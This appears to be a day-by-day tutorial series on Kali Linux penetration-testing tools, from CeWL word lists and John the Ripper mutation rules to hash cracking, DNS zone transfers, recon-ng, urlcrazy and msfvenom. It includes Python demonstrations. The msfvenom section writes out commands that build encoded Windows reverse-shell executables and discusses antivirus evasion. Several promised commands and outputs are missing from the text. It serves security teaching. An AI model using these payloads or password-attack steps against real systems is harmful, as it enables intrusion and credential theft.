- Day 1: CeWL
- Day 2: Password Mutation using John the Ripper
- Day 3: Hash Identification
- Day 4: Using Online Hash Databases
- Day 5: Zone Transfer Tool
- Day 6: recon-ng
- Day 7: urlcrazy
- Day 8: searchsploit
- Day 9: msfvenom
- Day 10: nmap Scripting Engine (NSE)
- Day 11: theharvester
- Day 12: BeEF
The first tool to be introduced is CeWL (Custom Word List generator). CeWL crawls a target website and returns the unique words found on its pages, which makes a good seed list for password guessing against that organisation's users.
CeWL can be run directly from the terminal in Kali Linux by issuing the command:
By default, this command crawls the target site to a maximum depth of 2 links from the starting page and only keeps words of at least 3 characters.
To view all the options available in cewl, issue the command:
Some of the other useful options are:
-w / --write <file>: Write the word list to a file instead of standard output
-d / --depth <int>: Depth to spider to (default 2)
-m / --min_word_length <int>: Minimum word length to keep (default 3)
-e / --email: Include email addresses found on the pages; --email_file <filename> writes them to a separate file
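To make concrete what CeWL does with a page, here is a small Python stand-in (an example added to this post, not CeWL's own code): it pulls the visible text out of an HTML page, keeps unique words of a minimum length in the order they were seen, and collects email addresses the way the -e / --email_file options do. The sample page and the addresses on it are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page used in place of a live crawl (not a real site).
SAMPLE_HTML = """
<html><head><title>EDGIS Security Notes</title>
<style>.hdr{color:red}</style>
<script>var token = "ignored_script_word";</script></head>
<body>
<h1>Welcome to EDGIS</h1>
<p>Contact us at info@edgis.example or security@edgis.example.</p>
<p>Our projects: Kali, CeWL, recon-ng and John the Ripper. An A to Z guide.</p>
</body></html>
"""

WORD_RE = re.compile(r"[A-Za-z]+(?:-[A-Za-z]+)*")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class VisibleText(HTMLParser):
    """Collect the text a visitor would read, skipping <script> and <style> bodies."""

    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skipping = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skipping += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skipping:
            self._skipping -= 1

    def handle_data(self, data):
        if not self._skipping:
            self.chunks.append(data)


def extract_words(html, min_length=3, lowercase=False):
    """Unique words from the page text, in first-seen order, like CeWL's default output.
    min_length mirrors -m (CeWL's default is 3); lowercase mirrors --lowercase."""
    parser = VisibleText()
    parser.feed(html)
    seen, words = set(), []
    for word in WORD_RE.findall(" ".join(parser.chunks)):
        if lowercase:
            word = word.lower()
        if len(word) < min_length or word in seen:
            continue
        seen.add(word)
        words.append(word)
    return words


def extract_emails(html):
    """Email addresses on the page, the data CeWL's -e / --email_file options collect."""
    return sorted(set(EMAIL_RE.findall(html)))


if __name__ == "__main__":
    for w in extract_words(SAMPLE_HTML):
        print(w)
    print("emails:", extract_emails(SAMPLE_HTML))
```

Note that "Security" and "security" are both kept by default, exactly as CeWL does unless --lowercase is given; deciding whether to fold case is a trade-off between list size and coverage of how users actually type.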
Previously, using CeWL, we generated a word list by crawling a website. On its own that list is often a poor guessing list, because users commonly append a few digits to a base word: "password" becomes "password01", for example.
John the Ripper can generate a new word list that includes such mutations. To do that, new rules are added to its configuration file as a [List.Rules:NAME] section. On Kali the configuration file is /etc/john/john.conf; other builds read john.conf from the directory John is installed in. To add a new rule set, simply append it to the configuration file.
To define a rule set that appends one digit to each word in the list, append the following to the configuration file:
To define a rule set that appends two digits to each word in the list, append the following to the configuration file:
To define a rule set that appends a pre-defined set of symbols to each word in the list, append the following to the configuration file:
To prepend instead of append, simply replace the '$' command with '^'.
Lastly, to generate the new wordlist with password mutation, simply use the following command in the terminal.
john --wordlist=[path to the wordlist] --stdout --rules=[rule set name] > [generated wordlist file path]
john --wordlist=wordlist --stdout --rules=AppendDigits > newWordList
Looking at the new word list, you will notice two digits have been appended to each word. Each input word now appears once per two-digit suffix 00 to 99, so the list is 100 times the size of the original; rule sets multiply quickly, which is the price of the extra coverage.
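Here is what John's rule preprocessor does with such rules, as an added Python example (not John's own code): it reads [List.Rules:NAME] sections from a constructed john.conf fragment, expands the [..] character classes into concrete rules and applies them to a word list in the same rule-outer, word-inner order that john --stdout --rules produces. The rule set names are my own; only the [List.Rules:NAME] header and the $ / ^ / [..] syntax are John's, and only that small subset of the rule language is implemented here.

```python
import itertools
import re

# Constructed john.conf fragment with the rule sets described above. The section
# names are my own; only the [List.Rules:NAME] header and the $ / ^ / [..] syntax
# are John's.
JOHN_CONF_RULES = """
[List.Rules:AppendDigit]
$[0-9]

[List.Rules:AppendDigits]
$[0-9]$[0-9]

[List.Rules:AppendSymbols]
$[!@#$]

[List.Rules:PrependDigit]
^[0-9]
"""

# One rule command: $ (append) or ^ (prepend) followed by a literal or a [..] class.
TOKEN_RE = re.compile(r"([$^])(\[([^\]]+)\]|.)")


def load_rule_sets(conf_text):
    """Map each [List.Rules:NAME] section to its list of rule lines."""
    sets, current = {}, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[List\.Rules:([^\]]+)\]", line)
        if header:
            current = header.group(1)
            sets[current] = []
        elif current is not None:
            sets[current].append(line)
    return sets


def expand_class(spec):
    """Expand a class body such as 0-9 or !@#$ into its characters."""
    chars, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(spec[i])
            i += 1
    return chars


def preprocess(rule):
    """Turn one rule line into concrete rules, taking the Cartesian product of its
    [..] classes the way John's rule preprocessor does. Each concrete rule is a
    list of (command, char) pairs."""
    tokens = TOKEN_RE.findall(rule)
    if "".join(cmd + body for cmd, body, _ in tokens) != rule:
        raise ValueError(f"unsupported rule syntax: {rule!r}")
    choices = []
    for cmd, body, cls in tokens:
        chars = expand_class(cls) if cls else [body]
        choices.append([(cmd, ch) for ch in chars])
    return [list(combo) for combo in itertools.product(*choices)]


def apply_rule(word, concrete):
    for cmd, ch in concrete:
        word = word + ch if cmd == "$" else ch + word
    return word


def mutate(words, rule_lines):
    """Apply a rule set to a word list. Like john --stdout --rules, the loop runs
    rule-by-rule over the whole list, so output is grouped by rule, not by word."""
    out = []
    for rule in rule_lines:
        for concrete in preprocess(rule):
            out.extend(apply_rule(w, concrete) for w in words)
    return out


def expansion_factor(rule_lines):
    """How many candidates each input word becomes under the rule set."""
    return sum(len(preprocess(rule)) for rule in rule_lines)


if __name__ == "__main__":
    rule_sets = load_rule_sets(JOHN_CONF_RULES)
    for name, lines in rule_sets.items():
        print(f"{name}: x{expansion_factor(lines)} -> {mutate(['password'], lines)[:3]} ...")
```

expansion_factor() is the number to watch before writing a rule set: two digit classes give 100 candidates per word, and a third class of 32 symbols would push that past 3,000, so the generated list grows far faster than the CeWL output it started from.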
Identifying the hash algorithm behind a digest narrows the search space when cracking it. In Kali, hash-identifier guesses the algorithm from the digest's length and character set.
The usage is simple: paste in the digest and hash-identifier lists the most likely algorithms first, followed by less likely ones. Because many algorithms produce digests of the same length (MD5, MD4 and NTLM are all 32 hex characters), treat the result as a ranked guess and confirm it against where the hash came from when you can.
Original text: edgis
Tool Used to Generate the Digests: http://www.fileformat.info/tool/hash.htm
After identifying the hash algorithm, we can try to crack the digest. One useful tool in Kali Linux is findmyhash, which looks the digest up in several online hash databases. Once it finds a match it stops and returns the plaintext that produces that digest.
findmyhash <hash algorithm> -h <hash>
Original text: password
Do note that this process may take some time and may return nothing if the digest is not in any of the online databases findmyhash uses. Bear in mind, too, that every lookup sends the hash to third-party services, which may not be acceptable for hashes recovered on a client engagement; in that case crack locally instead.
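Days 3 and 4 together, as an added Python example (not the code of hash-identifier or findmyhash): identify() ranks candidate algorithms first by modular-crypt prefix and then by hex digest length, the same heuristics hash-identifier relies on, and crack() tries each candidate against a local word list, an offline stand-in for the online lookup so nothing leaves the machine. The word list is constructed; "edgis" is the plaintext used for the digests above.

```python
import hashlib
import re

# Candidate algorithms by hex digest length, most common first. Several algorithms
# share a length, which is why hash-identifier can only rank guesses.
HEX_LENGTHS = {
    32: ["MD5", "MD4", "NTLM", "LM"],
    40: ["SHA-1", "MySQL 4.1+", "RIPEMD-160"],
    56: ["SHA-224", "SHA3-224"],
    64: ["SHA-256", "SHA3-256", "BLAKE2s"],
    96: ["SHA-384", "SHA3-384"],
    128: ["SHA-512", "SHA3-512", "BLAKE2b", "Whirlpool"],
}

# Modular-crypt style prefixes identify the scheme unambiguously.
PREFIXES = [
    ("$1$", "md5crypt"), ("$apr1$", "Apache APR1 md5crypt"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$5$", "sha256crypt"), ("$6$", "sha512crypt"),
    ("{SHA}", "LDAP SHA-1 (base64)"), ("{SSHA}", "LDAP salted SHA-1 (base64)"),
]

# Algorithms we can recompute locally (name -> hashlib constructor name).
HASHLIB_NAMES = {
    "MD5": "md5", "MD4": "md4", "SHA-1": "sha1", "SHA-224": "sha224",
    "SHA-256": "sha256", "SHA-384": "sha384", "SHA-512": "sha512",
    "SHA3-224": "sha3_224", "SHA3-256": "sha3_256", "SHA3-384": "sha3_384",
    "SHA3-512": "sha3_512", "BLAKE2s": "blake2s", "BLAKE2b": "blake2b",
    "RIPEMD-160": "ripemd160", "Whirlpool": "whirlpool",
}


def identify(digest):
    """Rank candidate algorithms for a digest by prefix, then by hex length."""
    digest = digest.strip()
    for prefix, name in PREFIXES:
        if digest.startswith(prefix):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", digest):
        return list(HEX_LENGTHS.get(len(digest), []))
    return []


def compute(name, plaintext):
    """Digest of plaintext under the named algorithm, or None if this example has
    no implementation for it. Raises ValueError when the local OpenSSL lacks the
    algorithm (md4, ripemd160 and whirlpool are often missing)."""
    data = plaintext.encode()
    if name == "NTLM":
        return hashlib.new("md4", plaintext.encode("utf-16-le")).hexdigest()
    if name == "MySQL 4.1+":
        return hashlib.sha1(hashlib.sha1(data).digest()).hexdigest()
    algo = HASHLIB_NAMES.get(name)
    return hashlib.new(algo, data).hexdigest() if algo else None


def crack(digest, wordlist):
    """Offline counterpart to findmyhash: instead of asking online databases, test
    every candidate algorithm from identify() against a local word list."""
    target = digest.strip().lower()
    for name in identify(target):
        for word in wordlist:
            try:
                candidate = compute(name, word)
            except ValueError:  # algorithm unavailable in this Python build
                break
            if candidate is not None and candidate.lower() == target:
                return name, word
    return None


if __name__ == "__main__":
    # "edgis" is the plaintext behind the digests in this post; the word list is constructed.
    sample = hashlib.sha1(b"edgis").hexdigest()
    print(identify(sample))
    print(crack(sample, ["password", "123456", "edgis"]))
```

crack() returns the algorithm together with the plaintext, which matters for the 32- and 40-character cases: a hit under NTLM and a hit under MD5 point at very different systems.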
Misconfigured DNS often exposes data. A classic example is a name server that answers zone transfer (AXFR) requests from any host: a single request returns every record in the zone, mapping out the organisation's hosts. dig and host can request a zone transfer by hand; in Kali Linux, dnsenum automates this and other DNS enumeration.
dnsenum <domain>
There are many options available in dnsenum. Some of the useful ones are:
-t / --timeout <int>: TCP and UDP timeout in seconds
--threads <int>: Number of threads used to perform the different queries
To view more options, use -h / --help. Zone transfers should only be permitted to an organisation's own secondary name servers; a server that hands the whole zone to dnsenum is the finding to report.
recon-ng is a powerful, full-featured web reconnaissance framework. Its workspaces, modules and option handling feel very similar to the Metasploit Framework (MSF).
There you go. Contact details of the domain name holder.
There are a lot of modules to explore. Some of the more interesting ones:
- recon/companies-contacts/facebook
- recon/creds-creds/leakdb
- recon/domain-creds/pwnedlist/leaks_dump
- recon/hosts-hosts/ip_neighbor
- recon/locations-locations/reverse_geocode
Have fun “recon-ing”.
urlcrazy is a tool in Kali Linux that generates and tests typos and variations of a domain name, to detect typo squatting, URL hijacking, phishing and corporate espionage.
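What urlcrazy generates, as an added Python example (not urlcrazy's own code): the common typo classes applied to the label of a domain, plus TLD swaps and the missing-dot variant. The keyboard-neighbour map, homoglyph table and TLD list are small constructed tables; urlcrazy's own lists are longer, and it additionally resolves each candidate and checks whether it is registered, which this example does not.

```python
# Toy typo-domain generator in the spirit of urlcrazy. The keyboard map, homoglyph
# table and TLD list are constructed here and deliberately small.
ADJACENT = {
    "q": "wa", "w": "qesa", "e": "wrds", "r": "etfd", "t": "rygf", "y": "tuhg",
    "u": "yijh", "i": "uokj", "o": "iplk", "p": "ol",
    "a": "qwsz", "s": "awedxz", "d": "serfcx", "f": "drtgvc", "g": "ftyhbv",
    "h": "gyujnb", "j": "huikmn", "k": "jiolm", "l": "kop",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "m": "rn"}
COMMON_TLDS = ["com", "net", "org", "co", "io", "info"]


def split_domain(domain):
    """'example.com' -> ('example', 'com'). Only the last dot is split, so
    'example.co.uk' yields the label 'example.co'."""
    label, _, tld = domain.lower().rpartition(".")
    if not label or not tld:
        raise ValueError(f"expected name.tld, got {domain!r}")
    return label, tld


def label_variants(label):
    """Typo classes applied to the registrable label."""
    n = len(label)
    return {
        "omission": {label[:i] + label[i + 1:] for i in range(n)},
        "repetition": {label[:i + 1] + label[i] + label[i + 1:] for i in range(n)},
        "transposition": {
            label[:i] + label[i + 1] + label[i] + label[i + 2:]
            for i in range(n - 1) if label[i] != label[i + 1]
        },
        "replacement": {  # neighbouring key hit instead of the right one
            label[:i] + c + label[i + 1:]
            for i, ch in enumerate(label) for c in ADJACENT.get(ch, "")
        },
        "insertion": {  # neighbouring key hit as well as the right one
            label[:i + 1] + c + label[i + 1:]
            for i, ch in enumerate(label) for c in ADJACENT.get(ch, "")
        },
        "homoglyph": {
            label[:i] + HOMOGLYPHS[ch] + label[i + 1:]
            for i, ch in enumerate(label) if ch in HOMOGLYPHS
        },
    }


def typo_domains(domain):
    """Return {typo_class: sorted candidate domains}, never including the original."""
    label, tld = split_domain(domain)
    out = {cls: {f"{v}.{tld}" for v in variants if v and v != label}
           for cls, variants in label_variants(label).items()}
    out["wrong_tld"] = {f"{label}.{t}" for t in COMMON_TLDS if t != tld}
    out["missing_dot"] = {f"www{label}.{tld}"}
    return {cls: sorted(c for c in cands if c != domain.lower()) for cls, cands in out.items()}


def all_candidates(domain):
    return sorted(set().union(*typo_domains(domain).values()))


if __name__ == "__main__":
    for cls, cands in typo_domains("example.com").items():
        print(f"{cls:14} {len(cands):3}  e.g. {cands[:3]}")
    print("total:", len(all_candidates("example.com")))
```

The candidate list is the input to the real work, which is checking which of these names already resolve and who holds them; that is the part urlcrazy does for you and the part to monitor over time.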
searchsploit makes searching the local copy of the Exploit Database that ships with Kali Linux very easy.
Given a keyword, searchsploit returns the matching entries and the file path of each exploit on disk.
msfvenom is the successor of msfpayload and msfencode, both of which were slated for retirement in June 2015. msfvenom consolidates the features of its predecessors and standardises their usage.
msfvenom can (1) generate many kinds of shellcode (the role of msfpayload) and (2) encode that shellcode into formats that can be deployed onto targets (the role of msfencode).
To show available output formats:
Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war
Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
Demo: Generate Payload (windows/shell/reverse_tcp)
This payload needs both LHOST and LPORT set. In this demo I will use 192.168.1.100 and 5555 respectively, and output the payload in Python format.
Often a payload contains bytes that the target will mangle or that break the exploit. The classic example is the null byte \x00, which terminates C strings: a payload copied with strcpy is cut off at the first null. The -b option lists the bytes to avoid, and msfvenom then picks an encoder and key whose output is free of them.
We can also output the payload in executable format:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f exe > shell-exe
Note: because -b was given, msfvenom automatically applied one round of x86/shikata_ga_nai, a polymorphic XOR additive feedback encoder, to eliminate the null bytes. Extra encoding iterations are often suggested as a way to evade antivirus detection. To encode the payload with shikata_ga_nai 10 times:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe > shell-exe
Notice that both payloads yield almost the same detection rate? Iterating the encoder only changes the encoded payload bytes; most antivirus vendors already recognise the executable templates Metasploit wraps payloads in, and those are identical in both files.
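To see what "XOR additive feedback" means and why -b can be satisfied by choosing a key, here is a toy encoder, an added Python example and not Metasploit's x86/shikata_ga_nai: each byte is XORed with a running key, and the ciphertext byte is then added back into the key, so one flipped input byte changes everything after it and different keys give entirely different output. pick_key() searches the key space for an encoding with no forbidden bytes, which is the search msfvenom runs when -b is given. The payload bytes are constructed to contain nulls and are not real shellcode; the real encoder works on 32-bit words and emits a polymorphic decoder stub, neither of which is modelled here.

```python
BAD_CHARS = b"\x00"

# Constructed stand-in for a raw payload; the embedded null bytes are the problem
# -b "\x00" is meant to solve. Not real shellcode.
PAYLOAD = bytes.fromhex("fce800000000" "6089e531c0648b5030" "00")


def find_bad(data, bad=BAD_CHARS):
    """Offsets and values of forbidden bytes in data (what -b must eliminate)."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def encode(payload, key):
    """Toy byte-wise XOR additive-feedback encoder: XOR each byte with the running
    key, then fold the ciphertext byte back into the key. x86/shikata_ga_nai does
    this on 32-bit words with a polymorphic decoder stub; only the idea is kept."""
    out, k = bytearray(), key & 0xFF
    for p in payload:
        c = p ^ k
        out.append(c)
        k = (k + c) & 0xFF
    return bytes(out)


def decode(blob, key):
    """Inverse of encode(); a decoder stub would do this at run time on the target."""
    out, k = bytearray(), key & 0xFF
    for c in blob:
        out.append(c ^ k)
        k = (k + c) & 0xFF
    return bytes(out)


def encode_iterations(payload, key, iterations):
    """Apply the encoder several times with one key (the -i idea, simplified)."""
    for _ in range(iterations):
        payload = encode(payload, key)
    return payload


def decode_iterations(blob, key, iterations):
    for _ in range(iterations):
        blob = decode(blob, key)
    return blob


def pick_key(payload, bad=BAD_CHARS, iterations=1):
    """Search the key space for an encoding whose output contains none of the bad
    bytes; msfvenom runs the same kind of search and fails if no key works."""
    for key in range(1, 256):
        blob = encode_iterations(payload, key, iterations)
        if not find_bad(blob, bad):
            return key, blob
    return None


if __name__ == "__main__":
    print("bad bytes in raw payload:", find_bad(PAYLOAD))
    key, blob = pick_key(PAYLOAD)
    print(f"key=0x{key:02x} encoded={blob.hex()} bad={find_bad(blob)}")
    assert decode(blob, key) == PAYLOAD
```

Two things the toy makes visible: the bad-byte check is done on the encoder output, never on the original payload, and every extra iteration only rewrites those payload bytes. Anything wrapped around them, such as the executable template, is untouched by -i, which is what the detection rates above reflect.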
nmap Scripting Engine (NSE) ships many scripts that are useful in a network penetration test, and it lets users write their own Lua scripts to automate networking tasks. It was designed with the following uses in mind (http://nmap.org/book/nse.html#nse-intro):
- Network Discovery
- More Sophisticated Version Detection
- Vulnerability Detection
- Backdoor Detection
- Vulnerability Exploitation
A list of available scripts can be found in the nmap documentation (http://nmap.org/nsedoc/).